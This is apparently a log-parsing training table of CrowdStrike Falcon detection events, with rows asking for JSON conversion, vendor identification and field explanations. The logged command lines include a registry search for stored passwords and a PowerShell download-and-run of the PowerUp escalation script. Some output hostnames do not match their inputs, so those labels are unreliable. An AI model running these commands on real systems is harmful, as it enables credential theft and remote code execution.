input_text stringlengths 52 64.8k | output_text stringlengths 23 66k | instruction stringclasses 3 values |
|---|---|---|
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\system32\\reg.exe\" QUERY HKLM /F password /t REG_SZ /S /K","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf",
"filename": "reg.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"9162\",\"behavior_id\":\"10250\",\"filename\":\"reg.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\system32\\\\reg.exe\\\" QUERY HKLM /F password /t REG_SZ /S /K\",\"scenario\":\"suspicious_activity\",\"objective\":\"Explore\",\"tactic\":\"Discovery\",\"tactic_id\":\"TA0007\",\"technique\":\"System Network Configuration Discovery\",\"technique_id\":\"T1016\",\"display_name\":\"ReconCommands2\",\"description\":\"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"ioc_source\":\"library_load\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954\",\"sha256\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"md5\":\"8a93acac33151793f8d52000071c0b06\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\"},\"pattern_disposition\":2048,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":true,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T16:44:43Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "28.28.91.62",
"userName": "johndoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\system32\\reg.exe\" QUERY HKLM /F password /t REG_SZ /S /K","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\system32\\reg.exe\" QUERY HKLM /F password /t REG_SZ /S /K","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asacmeiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675347806954","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=28.28.91.62 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: 19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf
filename: reg.exe
filepath: \Device\HarddiskVolume1\Windows\System32\reg.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T16:44:43Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 28.28.91.62
userName: johndoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "N/A",
"filename": "powershell.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"alice\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T16:44:43Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "167.150.220.102",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=167.150.220.102 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: N/A
filename: powershell.exe
filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T16:44:43Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 167.150.220.102
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"fish","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "N/A",
"filename": "powershell.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
